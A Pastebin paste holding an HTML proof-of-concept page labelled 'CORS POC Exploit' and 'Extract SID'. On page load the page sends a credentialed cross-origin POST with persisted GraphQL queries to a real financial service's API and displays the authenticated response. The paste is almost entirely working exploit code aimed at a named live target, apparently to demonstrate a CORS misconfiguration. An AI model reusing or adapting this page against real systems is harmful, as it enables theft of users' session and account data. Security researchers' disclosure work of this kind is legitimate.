Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <script>
- function cors() {
- var xhttp = new XMLHttpRequest();
- xhttp.onreadystatechange = function() {
- if (this.readyState == 4 && this.status == 200) {
- document.getElementById("demo").innerHTML = alert(this.responseText);
- }
- };
- xhttp.open("POST", "https://graphql.acorns.com/graphql", false);
- xhttp.withCredentials = true;
- xhttp.send(JSON.stringify([{"operationName":"ReferralAgreement","variables":{},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"9aa5eea00b7233edd06804ab161d5b3f99817b71ed255013384e004f0a90afc0"}}},{"operationName":"IsAuthenticated","variables":{},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"b62979ec74c2334ebed089531504a59c7654e007185d3e4b22e327d34a64263d"}}}]));
- }</script></head>
- <body onload="cors()">
- <center>
- <h2>CORS POC Exploit armaan </h2>
- <h3>Extract SID</h3><div id="demo">
- <button type="button" onclick="cors()">Exploit</button></div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement